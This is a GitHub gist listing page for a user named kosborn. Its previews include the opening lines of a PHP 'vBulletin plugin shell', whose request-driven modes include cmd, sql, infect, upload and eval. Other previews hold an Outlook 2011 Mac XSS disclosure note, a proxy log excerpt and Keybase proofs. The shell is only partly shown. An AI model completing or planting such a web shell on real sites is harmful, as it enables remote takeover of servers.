Skip to content

Instantly share code, notes, and snippets.

View kosborn's full-sized avatar

Kos kosborn

197 followers · 5 following
  • California
View GitHub Profile
@kosborn
kosborn / gist:4861099
Created February 13, 2013 02:00
vBulletin plugin shell
<?php
@set_time_limit(0);
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down");
$mode = $_REQUEST['mode'];
if (in_array($mode, $modearr)) {
function ws_stripslashes($string) {
if (get_magic_quotes_gpc()) {
return StripSlashes($string);
} else {
@kosborn
kosborn / gist:4862121
Created February 13, 2013 02:01
vBulletin Plugin Shell (unpacked)
<?
@set_time_limit(0);
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down");
$mode = $_REQUEST['mode'];
if (in_array($mode, $modearr)) {
function ws_stripslashes($string) {
if (get_magic_quotes_gpc()) {
return StripSlashes($string);
} else {
return $string;
@kosborn
kosborn / XSSOutlook.md
Last active August 29, 2015 14:03
XSS in Outlook 2011 Mac

XSS in Outlook 2011 for Mac

Fixed in ms14-017, unattributed.

This is kind of a dumb bug, but interesting none the less. It was found by Yoni Ramon and myself while testing for vulnerabilities in a CMS at the beginning of 2014. While the particular injection point on the CMS was not vulnerable, we noticed it was sending HTML in emails directly to users. HTML in emails is not really a vulnerability, however this we discovered a JS-filtering bypass that allowed us to inject JS into the client.

The short version is (long version in email below):

  • JS is ignored in emails
  • In the case that a user receives two emails, a thread is created
  • The preview pain of the thread appears to render HTML
  • The tag embedded into itself successfully bypass the JS filter
@kosborn
kosborn / prefs.c
Created October 6, 2015 06:07
Bool
senescent_p (void)
{
/* If you are in here because you're planning on disabling this warning
before redistributing my software, please don't.
I sincerely request that you do one of the following:
1: leave this code intact and this warning in place, -OR-
@kosborn
kosborn / keybase.md
Created May 13, 2017 00:50
keybase.md

Keybase proof

I hereby claim:

  • I am kosborn on github.
  • I am kos (https://keybase.io/kos) on keybase.
  • I have a public key ASDsNmhV1lARSRRYFpM2u1ytRTx9llez-98OXc1EoQ0zgwo

To claim this, I am signing this object:

@kosborn
kosborn / gist:5ab9ceef6fd5f38ed395edf1eed2d007
Created July 13, 2017 18:34
1286536308.779 180 192.168.0.224 TCP_MISS/200 411 GET http://liveupdate.symantecliveupdate.com/minitri.flg - DIRECT/125.23.216.203 text/plain
1286536308.910 37 192.168.0.224 TCP_MISS/200 4083 GET http://liveupdate.symantecliveupdate.com/streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip - DIRECT/125.23.216.203 application/zip
1286536309.450 917 192.168.0.227 TCP_MISS/200 20670 GET http://www.youtube.com/watch? - DIRECT/209.85.231.136 text/html
1286536309.549 172 192.168.0.227 TCP_MISS/204 294 GET http://v15.lscache3.c.youtube.com/generate_204? - DIRECT/122.160.120.150 text/html
1286536309.586 921 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tubemogul.co...eiver/services - DIRECT/174.129.41.128 application/xml
1286536309.608 829 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tubemogul.co...eiver/services - DIRECT/174.129.41.128 application/xml
1286536309.660 785 192.168.0.68 TCP_MISS/200 507 POST http://rcv-srv37.inplay.tube
@kosborn
kosborn / keybase.md
Created March 12, 2025 17:32

Keybase proof

I hereby claim:

  • I am kosborn on github.
  • I am kos (https://keybase.io/kos) on keybase.
  • I have a public key ASAy9byBro-Gs0OpExDNCU0LhkEO-RaA4x5BqK4aAYv7RAo

To claim this, I am signing this object: